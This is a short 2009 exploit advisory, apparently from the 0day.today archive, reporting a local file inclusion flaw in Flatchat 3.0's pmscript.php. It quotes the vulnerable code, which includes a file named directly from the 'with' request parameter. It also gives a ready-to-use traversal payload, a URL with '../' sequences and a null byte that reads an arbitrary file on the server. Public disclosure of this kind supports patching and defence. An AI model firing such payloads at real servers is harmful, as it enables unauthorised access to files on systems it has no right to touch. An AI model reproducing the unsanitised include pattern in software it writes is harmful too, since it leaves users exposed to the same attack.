id: 5107
date: 04/26/2009
title: Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
author: SirGod
cves: 

===================================================================
Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
===================================================================


##########################################################################################
[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
[+] Discovered By SirGod
##########################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Local File Inclusion

  - Vulnerable code in pmscript.php

--------------------------------------------
$filename = 'users/'.$_GET['with'].'.php';

if (file_exists($filename)) {
    include($filename);
--------------------------------------------


    http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00

##########################################################################################



#  0day.today [2023-03-22]  #